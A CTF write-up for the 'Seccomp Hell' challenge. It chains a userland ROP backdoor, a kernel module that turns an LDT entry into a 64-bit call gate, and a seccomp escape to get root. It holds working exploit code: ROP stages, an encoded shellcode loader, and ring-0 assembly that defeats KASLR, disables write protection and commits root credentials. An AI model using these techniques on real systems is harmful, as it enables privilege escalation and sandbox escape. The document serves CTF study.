Some challenges are userland pwns, others are kernel pwn, still others are sandbox escapes. In Seccomp Hell, you can get all three for free <3

Note: Try getting a full root shell for this challenge



You need to exploit three parts in this challenge:

  1. userland exploitation
    a backdoor that accepts a ROP chain, which can be used to get arbitrary code execution

  2. kernel backdoor
    a backdoor that creates a call gate in the LDT (Local Descriptor Table), which gives us kernel-mode execution for our kernel shellcode

  3. sandbox escape
    disable seccomp and escalate privileges through kernel shellcode (corrupt the current task_struct)


Guessing from the challenge description, there will be at least three parts: 1. userland exploitation, 2. kernel exploitation, 3. sandbox escape (seccomp).

The challenge consists of only three files:

├── bzImage
├── initramfs.cpio.gz
└── run.sh

a simple run.sh script


qemu-system-x86_64 \
    -cpu qemu64,+smap \
    -m 4096M \
    -kernel bzImage \
    -initrd initramfs.cpio.gz \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \
    -monitor /dev/null \
    -nographic \
    -netdev user,id=net0,hostfwd=tcp::22222-:22222 \
    -device e1000,netdev=net0 \

One important aspect is that the +smep (Supervisor Mode Execution Protection) flag is missing ... foreshadowing

Also, here is an explanation of the kernel parameters:

  • console=ttyS0
    console output goes to the serial port; nothing interesting, but use context.newline = b'\r\n'

  • loglevel=3
    reduces the amount of logging, can be increased or removed for easier debugging

  • oops=panic
    immediately panic on every kernel oops, which means our kernel exploit needs to be precise

  • panic=-1
    immediately reboot on kernel panic, so we can't just corrupt the kernel from another socket connection (not that we necessarily wanted to do this anyway)

  • pti=on
    enable Page Table Isolation (so no CPU side channels)

We can decompress the initramfs.cpio.gz file using something similar to this script.
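
If no extraction script is at hand, the archive can also be inspected from Python. The following is only a minimal sketch: it assumes the initramfs is a single gzip-compressed cpio archive in the common "newc" format, and the helper names parse_newc and list_initramfs are made up for this example.

```python
import gzip


def parse_newc(blob: bytes):
    """Yield (name, mode, data) for every entry of a 'newc' cpio archive."""
    pos = 0
    while True:
        header = blob[pos:pos + 110]
        if header[:6] != b"070701":
            raise ValueError("not a newc cpio header at offset %d" % pos)
        # 13 fields of 8 hex digits follow the 6-byte magic
        fields = [int(header[6 + 8 * i:14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = fields[1], fields[6], fields[11]
        name_start = pos + 110
        name = blob[name_start:name_start + namesize - 1].decode()
        # header+name and the file data are each padded to a 4-byte boundary
        data_start = (name_start + namesize + 3) & ~3
        data = blob[data_start:data_start + filesize]
        pos = (data_start + filesize + 3) & ~3
        if name == "TRAILER!!!":
            return
        yield name, mode, data


def list_initramfs(path: str):
    """Return (name, octal mode, size) for each file in a gzipped cpio."""
    with gzip.open(path, "rb") as f:
        blob = f.read()
    return [(name, oct(mode), len(data)) for name, mode, data in parse_newc(blob)]
```

Calling list_initramfs("initramfs.cpio.gz") should list the init script and both backdoor files, provided the format assumption holds.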

Let's first look at the init script:



chown 0:0 -R /
chown 1000:1000 -R /home/user
chmod 4755 /bin/busybox

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mount -t devtmpfs none /dev
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
/sbin/mdev -s

chmod 666 /dev/ptmx

# network
insmod /usr/lib/modules/e1000.ko
ifup lo >& /dev/null
ifup eth0 >& /dev/null

# banner
cat /etc/banner

# kernel backdoor
insmod /usr/lib/modules/i_am_definitely_not_backdoor.ko
chmod 0666 /dev/i_am_definitely_not_backdoor

# user backdoor
echo 'server starting...'
setsid cttyhack setuidgid 1000 /bin/socat tcp-l:22222,reuseaddr,fork EXEC:"/home/user/i_am_not_backdoor.bin",pty,stderr

poweroff -f

OK, so we know that our vulnerable userland binary is /home/user/i_am_not_backdoor.bin and the vulnerable kernel module is /usr/lib/modules/i_am_definitely_not_backdoor.ko, which is accessible through /dev/i_am_definitely_not_backdoor.

Test Environment

I used two of my own tools to set up my test environment:

  • vagd to exploit the userland binary

  • how2keap as a template for the kernel exploitation part

This is what my setup looks like:

├── Makefile
├── bins
   ├── i_am_definitely_not_backdoor.ko
   └── i_am_not_backdoor.bin
├── exploit.py
├── libs
   ├── pwn.h
   ├── util.c
   └── util.h
├── pwn.c
├── rootfs
   ├── ...
├── scripts
   ├── build.sh
   ├── compress.sh
   ├── decompress.sh
   ├── gdbinit
   └── start-qemu.sh
└── share
    ├── bzImage
    ├── flag.txt
    ├── initramfs.cpio.gz
    ├── rootfs.cpio.gz -> initramfs.cpio.gz
    └── run.sh


Let's first get some basic information:


bins/i_am_not_backdoor.bin: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=f4640517119249a926c7399197447b388e07807c, for GNU/Linux 3.2.0, with debug_info, not stripped


[*] './i_am_not_backdoor.bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] GCC: (Debian 13.2.0-24) 13.2.0

seccomp-tools dump:

 line  CODE  JT   JF      K
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0005
 0004: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0005: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x15 0x00 0x01 0x00000029  if (A != socket) goto 0015
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x15 0x00 0x01 0x0000002a  if (A != connect) goto 0017
 0016: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0017: 0x15 0x00 0x01 0x0000009a  if (A != modify_ldt) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0021
 0020: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0021: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0023
 0022: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0023: 0x06 0x00 0x00 0x00000000  return KILL

Hmm, so the syscalls that matter for running an assembly payload (mmap, mprotect) are allowed, and open lets us open the device of the vulnerable kernel module. Also, for some reason, a syscall called modify_ldt is whitelisted ... foreshadowing
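
To double-check the whitelist, the dump can be replayed in a tiny classic-BPF interpreter. This is only a sketch that supports the three opcodes appearing in the dump (0x20 load, 0x15 jump-if-equal, 0x06 return); the FILTER rows are rebuilt from the listing above and run_filter is a name made up for this example.

```python
# syscall numbers and names in the order they appear in the dump
ALLOWED = {0: "read", 1: "write", 2: "open", 3: "close", 9: "mmap",
           10: "mprotect", 41: "socket", 42: "connect", 154: "modify_ldt",
           60: "exit", 231: "exit_group"}

# (code, jt, jf, k) rows, same layout as the seccomp-tools output
FILTER = [(0x20, 0, 0, 0)]                   # A = sys_number
for nr in ALLOWED:
    FILTER.append((0x15, 0, 1, nr))          # if (A != nr) skip the next row
    FILTER.append((0x06, 0, 0, 0x7fff0000))  # return ALLOW
FILTER.append((0x06, 0, 0, 0x00000000))      # return KILL


def run_filter(nr: int) -> int:
    """Evaluate the filter for one syscall number and return the action."""
    acc, pc = 0, 0
    while True:
        code, jt, jf, k = FILTER[pc]
        pc += 1
        if code == 0x20:      # load: offset 0 of seccomp_data is the syscall nr
            acc = nr
        elif code == 0x15:    # jump if equal
            pc += jt if acc == k else jf
        elif code == 0x06:    # return k
            return k
        else:
            raise ValueError("opcode not handled by this sketch")
```

For example, run_filter(154) (modify_ldt) yields the ALLOW value 0x7fff0000, while run_filter(59) (execve) falls through to the final KILL row.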

Stage 1: ROP Backdoor

At first glance the binary seems fine, but it actually corrupts the return ptr and jmps to a backdoor function using ROP:

  CALL       LAB_004018d1
  ADD        qword ptr [RSP]=>local_1e0,offset backdoor
  PUSH       RBP
  MOV        RBP,RSP

the reversed backdoor code:

    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr)))

#define ALLOW_SYSCALL(name) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \

#define KILL_PROCESS \

void backdoor() {

  char rop[0];


    struct sock_filter seccomp_filter[] = {
        ALLOW_SYSCALL(modify_ldt), // foreshadowing

  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
      .filter = (struct sock_filter*)&seccomp_filter,

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);

The backdoor can be summarized like this:

  1. read BOF (rop chain) using read

  2. close STDIN, STDOUT and STDERR

  3. setup seccomp filter whitelist

Let's take a look at the open files before they are closed:

ls -l /proc/$(pidof i_am_not_backdoor.bin)/fd
lrwx------    1 user     users           64 Jul 12 17:12 0 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 1 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 2 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 3 -> socket:[385]
lrwx------    1 user     users           64 Jul 12 17:12 4 -> socket:[386]
lrwx------    1 user     users           64 Jul 12 17:12 5 -> /dev/ttyS0

interesting, STD fds simply point to /dev/pts/0, so what happens if we just open it again ... we regain a working STDIN.

Note: the /dev/pts/0 number increments if there are multiple concurrent connections. This was briefly a problem while the instance spawner was temporarily replaced with a shared instance.

Note: this approach was unintended, the intended solution opened a socket connection using the allowed socket and connect syscalls
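
The trick relies on the kernel always handing out the lowest free file descriptor: once fd 0 is closed, the next open returns 0 again. Here is a small sketch of that rule that avoids touching the real stdin; reopen_lowest is a hypothetical helper and os.devnull merely stands in for /dev/pts/0.

```python
import os


def reopen_lowest(path: str = os.devnull):
    """Free a descriptor, open a file, and report both descriptor numbers."""
    r, w = os.pipe()               # r is the lowest free descriptor right now
    os.close(r)                    # free it again, like the backdoor closing fd 0
    fd = os.open(path, os.O_RDWR)  # the kernel reuses the lowest free number
    os.close(w)
    return r, fd
```

Both returned numbers are equal, which is why a single open("/dev/pts/0", O_RDWR) in the ROP chain is enough to get a working fd 0 back.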

so let's write a simple payload that reopens /dev/pts/0 and writes a new ROP payload into a known memory address and pivot there.

Stage 1:

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b'' 

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.rdi = 0x258 
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open 
rop.rsi = cst.O_RDWR

rop.rsi = PIVOT
# rop.rdx = 0x400

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)

Stage 2: pivot ROP

Now that we have more control over the ROP chain, we can write a shellcode payload directly into memory, which we will need for further exploitation.

Stage 2:

linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER 
pivot.rdx = 0x1000



chain = flat({
  0: std,
  0x10: b'STAGE 2',
  0x18: b'STAGE 3',
  0x20: b'FAIL',
  0x100: pivot

linfo("pivot len: 0x%x", len(chain))


Stage 3: loader

At this point we realized that certain characters, e.g. \n and \x04 (End of Transmission), can't be sent through the pty. That's why we added another loader stage that decodes the payload and writes it into executable memory.

payload = asm('int 3')
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
  xor rbx, rbx
  // get two characters (one byte)
  push 0
  {shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
  cmp rax, 2
  jl FAIL
  pop rax
  sub ah, 0x41 
  sub al, 0x41 
  shl al, 2
  shl al, 2
  shr rax, 2
  shr rax, 2
  mov BYTE PTR [rbx+{PAYLOAD}], al
  inc rbx
  cmp rbx, {PAYLOAD_LEN}
  jb LOAD

  // jmp to next stage
  mov rax, {PAYLOAD+0x20}
  jmp rax

  {shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
  int 3

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
#  hex-like, with the digits starting at 'A'
#  and the least significant nibble first

payload_enc = b''
for b in payload:
  lo = (b & 0xf) + 0x41
  hi = ((b & 0xf0) >> 4) + 0x41
  payload_enc += bytes((lo, hi))

linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))
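
The encoding is easy to sanity-check offline. The sketch below mirrors the encoder above and models the arithmetic of the loader's decode loop (sub 0x41 on al and ah, shift al left by four, shift the register right by four); encode and decode are names chosen for this example only.

```python
def encode(payload: bytes) -> bytes:
    """Two characters per byte, 'A'..'P', least significant nibble first."""
    out = bytearray()
    for b in payload:
        out.append((b & 0x0F) + 0x41)  # low nibble
        out.append((b >> 4) + 0x41)    # high nibble
    return bytes(out)


def decode(enc: bytes) -> bytes:
    """Python model of the assembly decode loop in the loader."""
    out = bytearray()
    for i in range(0, len(enc), 2):
        al = (enc[i] - 0x41) & 0xFF      # sub al, 0x41
        ah = (enc[i + 1] - 0x41) & 0xFF  # sub ah, 0x41
        al = (al << 4) & 0xFF            # shl al, 2 (twice)
        ax = (ah << 8) | al
        out.append((ax >> 4) & 0xFF)     # shr rax, 2 (twice), then store al
    return bytes(out)
```

Because every encoded byte falls in the range 'A' to 'P', the pty line discipline never sees a control character.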


This basically finishes the userland exploitation stage


Let's get into the interesting part: the kernel. Let's reverse the backdoor.

simplified reversed backdoor:

int backdoor_open(void) { return 0; }
int backdoor_read(void) { return 0; }

int backdoor_write(void) {
  void* pte;    
  pte_t* pte_lock;

  // check if ldt exists (flip flops between two addresses)
  rc = follow_pte(const_pcpu_hot + 0x8f8, 0xffff880000010000,&pte,&pte_lock);
  if(rc != 0)
    return -EFAULT;

  // map ldt page for write
  char *ldt = vmap(pages,1,4, 0x8000000000000163);
  if (ldt == 0)
    return -EFAULT;

  // corrupt ldt entry 12

  ldt[0x60] = 0;
  ldt[0x61] = 0;

  ldt[0x65] = 0xec; // call gate
  ldt[0x66] = 0xc0;
  ldt[0x67] = 0;


  return 0;

static struct file_operations BACKDOOR_fops = {
    .owner = THIS_MODULE,
    .open = backdoor_open,
    .read = backdoor_read,
    .write = backdoor_write,

static struct miscdevice backdoor_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "i_am_definitely_not_backdoor",
    .fops = &BACKDOOR_fops,

int init_module(void) {
  return 0;

void cleanup_module(void)

int backdoor_release(void)
  return 0;


So this basically checks if a kernel page exists at 0xffff880000010000, and if that is the case it overwrites something at offset 0x60. Directly calling this kernel module fails, so how do we allocate something in this page? This is where the foreshadowing pays off: the mysterious modify_ldt syscall allocates the LDT in this page.

Note: modify_ldt actually flip-flops the LDT pages between two addresses on every call, so we need to call modify_ldt twice for this to work.

So what is the LDT and how does it work? The LDT (Local Descriptor Table) is a feature similar to the GDT (Global Descriptor Table). It holds segment descriptors, which give memory ranges attributes such as read, write and execute permissions. Descriptor tables can also hold system descriptors such as call, trap and interrupt gates (for example, an interrupt gate backs the legacy int 0x80 syscall entry), but modify_ldt can't create those: it always sets the S flag, and system descriptors need S clear. Additional info can be found in the Intel bible.

So let's understand an LDT entry. We can set the following options:


struct user_desc {
    unsigned int  entry_number;
    unsigned int  base_addr;
    unsigned int  limit;
    unsigned int  seg_32bit:1;
    unsigned int  contents:2;
    unsigned int  read_exec_only:1;
    unsigned int  limit_in_pages:1;
    unsigned int  seg_not_present:1;
    unsigned int  useable:1;
#ifdef __x86_64__
     * Because this bit is not present in 32-bit user code, user
     * programs can pass uninitialized values here.  Therefore, in
     * any context in which a user_desc comes from a 32-bit program,
     * the kernel must act as though lm == 0, regardless of the
     * actual value.
    unsigned int  lm:1;

that need to be translated into this struct.


struct desc_struct {
    u16 limit0;
    u16 base0;
    u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1;
    u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8;
} __attribute__((packed));

using this translation function.


static inline void fill_ldt(struct desc_struct *desc, const struct user_desc *info)
    desc->limit0        = info->limit & 0x0ffff;

    desc->base0     = (info->base_addr & 0x0000ffff);
    desc->base1     = (info->base_addr & 0x00ff0000) >> 16;

    desc->type      = (info->read_exec_only ^ 1) << 1;
    desc->type         |= info->contents << 2;
    /* Set the ACCESS bit so it can be mapped RO */
    desc->type         |= 1;

    desc->s         = 1;
    desc->dpl       = 0x3;
    desc->p         = info->seg_not_present ^ 1;
    desc->limit1        = (info->limit & 0xf0000) >> 16;
    desc->avl       = info->useable;
    desc->d         = info->seg_32bit;
    desc->g         = info->limit_in_pages;

    desc->base2     = (info->base_addr & 0xff000000) >> 24;
     * Don't allow setting of the lm bit. It would confuse
     * user_64bit_mode and would get overridden by sysret anyway.
    desc->l         = 0;

As mentioned, modify_ldt can't create a system segment (it never clears the S flag). So let's create a normal entry at index 12 (offset 0x60 / 8) and see what happens.


  struct user_desc ldt = {
      .entry_number = 12, // max 0x1ffe
      .base_addr = 0x8899aabb, // 32 bits
      .limit = 0xdeeff, // 20 bits
      .contents=0, // 2 bits
      .read_exec_only=0, // 1 bit
      .seg_not_present=0, // 1 bit
      .useable=0, // 1 bit
      .seg_32bit=0, // 1 bit
      .limit_in_pages=0, // 1 bit

  SYSCHK(syscallt(SYS_modify_ldt, 0x11, &ldt, sizeof(ldt)));

before corrupt:

0xffff880000010060:     0x880df399aabbeeff
0xffff880000010060:     0xeeff  0xaabb  0xf399  0x880d
0xffff880000010060:     0xff    0xee    0xbb    0xaa    0x99    0xf3    0x0d    0x88

desc_struct {
        .limit0        = 0xeeff
        .limit1        = 0xd
        .base0         = 0xaabb
        .base1         = 0x99
        .base2         = 0x88
        .type          = 0x3 (contents=0, writable=1 because read_exec_only=0, ACCESS=1)
        .s             = 1
        .dpl           = 3
        .p             = 1
        .avl           = 0
        .l             = 0
        .d             = 0
        .g             = 0
}
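
The raw value in the dump can be reproduced without booting the kernel. The following is a minimal Python sketch of the fill_ldt translation shown earlier; the function only mirrors the C bit layout and is not kernel code.

```python
import struct


def fill_ldt(base_addr, limit, seg_32bit=0, contents=0, read_exec_only=0,
             limit_in_pages=0, seg_not_present=0, useable=0) -> int:
    """Pack user_desc fields into the 8-byte descriptor, like fill_ldt()."""
    type_ = ((read_exec_only ^ 1) << 1) | (contents << 2) | 1
    # byte 5: type (4 bits), s = 1, dpl = 3, p
    access = type_ | (1 << 4) | (3 << 5) | ((seg_not_present ^ 1) << 7)
    # byte 6: limit1 (4 bits), avl, l = 0, d, g
    flags = ((limit >> 16) & 0xF) | (useable << 4) | (seg_32bit << 6) \
        | (limit_in_pages << 7)
    raw = struct.pack("<HHBBBB",
                      limit & 0xFFFF,            # limit0
                      base_addr & 0xFFFF,        # base0
                      (base_addr >> 16) & 0xFF,  # base1
                      access,
                      flags,
                      (base_addr >> 24) & 0xFF)  # base2
    return struct.unpack("<Q", raw)[0]
```

With the example values from above, hex(fill_ldt(0x8899aabb, 0xdeeff)) gives 0x880df399aabbeeff, the same quadword that sits at offset 0x60 of the LDT page.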

after corrupt:

0xffff880000010060:     0x00c0ec99aabb0000
0xffff880000010060:     0x0000  0xaabb  0xec99  0x00c0
0xffff880000010060:     0x00    0x00    0xbb    0xaa    0x99    0xec    0xc0    0x00

desc_struct {
        .limit0        = 0x0
        .limit1        = 0x0
        .base0         = 0xaabb
        .base1         = 0x99
        .base2         = 0x00
        .type          = 0xc (a system type now, because s = 0)
        .s             = 0
        .dpl           = 3
        .p             = 1
        .avl           = 0
        .l             = 0
        .d             = 1
        .g             = 1
}

So looks like the backdoor actually creates a system segment for us, let's look at the table to understand what system segment type we have

System-Segment and Gate-Descriptor Types:

Type Field             Description
Hex   11  10  9   8    32-Bit Mode               IA-32e Mode
0x0   0   0   0   0    Reserved                  Upper 8 bytes of a 16-byte descriptor
0x1   0   0   0   1    16-bit TSS (Available)    Reserved
0x2   0   0   1   0    LDT                       LDT
0x3   0   0   1   1    16-bit TSS (Busy)         Reserved
0x4   0   1   0   0    16-bit Call Gate          Reserved
0x5   0   1   0   1    Task Gate                 Reserved
0x6   0   1   1   0    16-bit Interrupt Gate     Reserved
0x7   0   1   1   1    16-bit Trap Gate          Reserved
0x8   1   0   0   0    Reserved                  Reserved
0x9   1   0   0   1    32-bit TSS (Available)    64-bit TSS (Available)
0xa   1   0   1   0    Reserved                  Reserved
0xb   1   0   1   1    32-bit TSS (Busy)         64-bit TSS (Busy)
0xc   1   1   0   0    32-bit Call Gate          64-bit Call Gate
0xd   1   1   0   1    Reserved                  Reserved
0xe   1   1   1   0    32-bit Interrupt Gate     64-bit Interrupt Gate
0xf   1   1   1   1    32-bit Trap Gate          64-bit Trap Gate

And the backdoor created a 64-bit Call Gate for us.
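
Once the descriptor is a call gate, the CPU reads the same eight bytes with a different layout: offset[15:0], target selector, a reserved byte, the type byte, then offset[31:16]. The sketch below replays the five byte writes of the backdoor on the dumped descriptor and decodes the result as a gate. apply_backdoor and decode_gate are illustrative names, and the upper eight bytes of the 16-byte gate (offset[63:32]) are left out.

```python
import struct


def apply_backdoor(desc: int) -> int:
    """Replay the backdoor's writes to bytes 0x60..0x67 of the LDT page."""
    raw = bytearray(struct.pack("<Q", desc))
    raw[0] = 0
    raw[1] = 0
    raw[5] = 0xEC  # p = 1, dpl = 3, s = 0, type = 0xc
    raw[6] = 0xC0
    raw[7] = 0
    return struct.unpack("<Q", raw)[0]


def decode_gate(desc: int) -> dict:
    """Interpret the low 8 bytes of a descriptor as a call gate."""
    off_lo, selector, _reserved, access, off_hi = struct.unpack(
        "<HHBBH", struct.pack("<Q", desc))
    return {
        "offset": off_lo | (off_hi << 16),
        "selector": selector,
        "type": access & 0xF,
        "s": (access >> 4) & 1,
        "dpl": (access >> 5) & 3,
        "p": access >> 7,
    }
```

For the example descriptor this yields a target offset of 0xc00000 and the selector 0xaabb, i.e. whatever base0 was. That explains why the exploit later puts __KERNEL_CS into base_addr and maps its ring 0 code at 0xc00000.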

Stage 4: kernel backdoor, LDT call gate

A call gate is an x86 feature that allows switching between privilege levels, similar to syscalls (interrupt gates).

After realizing this, we found this super cool writeup from hlt about his challenge one_byte from hxp 2022. It describes how to use a call gate to get CPL 0 (ring 0) code execution while bypassing SMAP.

Note: this wouldn't work if SMEP was enabled, because as far as I know you can't temporarily disable SMEP without direct access to CR4.

With a few adjustments we can create a privilege escalation PoC:

diff from one_byte solution:
< // gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn
> // gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn
< #define PERCPU_CURRENT 0x1fbc0
< #define STRUCT_TASK_STRUCT_CRED 0x0a80
< #define STRUCT_CRED_USAGE 0x0
< // TODO: Check that &ring0 == 0x401000
> #define COMMIT_CREDS 0xfc820
> #define PREPARE_CREDS 0xfccd0
> // TODO: Check that &ring0 == 0xc00000
<     // Set current->cred and current->real_cred to init_task->cred
<     addq $KASLR_INIT_TASK, %rdx
<     movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
<     addl $2, STRUCT_CRED_USAGE(%rdx)
<     movq %gs:PERCPU_CURRENT, %rax
<     movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
<     movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)
>     // get .text base
>     subq $(KASLR_WRITE_TO+0x400000), %rdi
>     andq $(~0xfffff), %rdi
>     movq %rdi, %r15
>     // privilige escalation
>     // crpt_cred = prepare_cred();
>     lea PREPARE_CREDS(%r15), %rax
>     call *%rax
>     // crpt_cred.uid = 0;
>     // crpt_cred.gid = 0;
>     movq %rax, %rdi
>     movq $0, 8(%rdi)
>     // commit_creds(crpt_cred);
>     lea COMMIT_CREDS(%r15), %rax
>     call *%rax
< asciz module_path, "/dev/one_byte"
> asciz module_path, "/dev/i_am_definitely_not_backdoor"
<     exit_64 $0
>     movq $0, %rdi
>     check_syscall_64 $SYS_exit

Privilege escalation PoC:

// gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn

#include <linux/mman.h>
#include <sys/syscall.h>

.pushsection .text.1
    negl %eax
    movl $SYS_exit_group, %eax

.macro check_syscall_64 nr:req, res=%rax
    movl \nr, %eax
    test \res, \res
    js __syscall_64_fail.L

.macro var name:req
    .pushsection .data
    .balign 8
    .local \name

.macro endvar name:req
    .local end_\name
    .eqv sizeof_\name, end_\name - \name

.macro asciz name:req, data:vararg
    var \name
        .asciz \data
    endvar \name

.macro far_ptr name:req, selector:req, offset:req
    var \name
        .int \offset
        .short \selector
    endvar \name

.macro fn name:req
    .global \name

// <*/fcntl.h> are all C-only
#define O_WRONLY 1

// Yes, ordering in kernel and user mode are different, blame AMD/Intel.
#define __KERNEL_CS   (2 * 8)

// For 4-level paging
#define LDT_BASE_ADDR 0xffff880000000000
#define LDT_STRIDE 0x10000
#define PTI_SWITCH_MASK 0x1000

// Arbitrary constants
#define STACK_SIZE 0x80000

// Selectors for the LDT have bit 2 set. Also RPLs
#define LDT_SELECTOR 0b100
#define RPL_KERNEL   0b000
#define RPL_USER     0b011
#define TARGET_ENTRY 12

// With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset:
//   0x0000000000401000 <- ring0
//   0x00000000ffdfffff
//             |||\___/
//             |||  \____ limit
//             \/\_______ G, D, 0, AV
//              \________ base_addr[31:24]

#define MSR_LSTAR 0xc0000082
#define KASLR_WRITABLE 0xa00000
#define KASLR_LSTAR 0xa00010
#define KASRL_WRITABLE_END 0xc00000
#define KASLR_WRITE_TO 0xbad000
#define KASLR_INIT_TASK 0x1613940

#define COMMIT_CREDS 0xfc820
#define PREPARE_CREDS 0xfccd0

// TODO: Check that &ring0 == 0xc00000
fn ring0
    // Disable interrupts (interrupts cause double faults right now)
    cli

    // Read LSTAR to bypass KASLR
    movl $MSR_LSTAR,  %ecx
    rdmsr
    shlq $32, %rdx
    orq %rax, %rdx
    subq $KASLR_LSTAR, %rdx
    movq %rdx, %rbp

    // Disable WP
    movq %cr0, %r8
    andq $(~(1 << 16)), %r8
    movq %r8, %cr0

    // Copy stage 2 to the mapped kernel entry point
    movq %rbp, %rdi
    addq $KASLR_WRITE_TO, %rdi
    movq %rdi, %r15
    leaq ring0_stage2(%rip), %rsi
    movl $sizeof_ring0_stage2, %ecx
    rep movsb

    // Jump there.
    jmp *%r15

var ring0_stage2
    // Get access to per-cpu variables (current, mostly) via swapgs
    swapgs

    // Get the current page table.
    movq %cr3, %rbx

    // Switch to the kernel page table.
    andq $(~PTI_SWITCH_MASK), %rbx
    movq %rbx, %cr3

    // get .text base
    subq $(KASLR_WRITE_TO+0x400000), %rdi
    andq $(~0xfffff), %rdi
    movq %rdi, %r15

    // privilige escalation
    // crpt_cred = prepare_cred();

    lea PREPARE_CREDS(%r15), %rax
    call *%rax

    // crpt_cred.uid = 0;
    // crpt_cred.gid = 0;
    movq %rax, %rdi
    movq $0, 8(%rdi)

    // commit_creds(crpt_cred);
    lea COMMIT_CREDS(%r15), %rax
    call *%rax

    // Swap back
    swapgs

    // Switch the page table back around
    orq $PTI_SWITCH_MASK, %rbx
    movq %rbx, %cr3

    // Build an `iret` stackframe rather than a `ret far` stack frame.
    popq %r8 // => %rip
    popq %r9 // => %cs
    pushfq
    orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti)
    pushq %r9
    pushq %r8
    iretq
endvar ring0_stage2

var user_desc
    // base2 (base_addr[31:24]) == cs_offset[31:24]
    // limit_in_pages           == cs_offset[23]
    // seg_32bit                == cs_offset[22]
    // NB: Because lm is ignored, cs_offset[21] must be 0
    // useable                  == cs_offset[20]
    // limit1 (limit[19:16])    == cs_offset[19:16]
    // flags0                   == (arbitrary, will be overwritten later)
    // base1 (base_addr[23:16]) == (ignored entirely)
    // base0 (base_addr[15:0])  == __KERNEL_CS
    // limit0 (limit[15:0])     == cs_offset[15:0]
    .int TARGET_ENTRY // entry_number
    .int __KERNEL_CS  // base_addr
    .int 0x01000      // limit
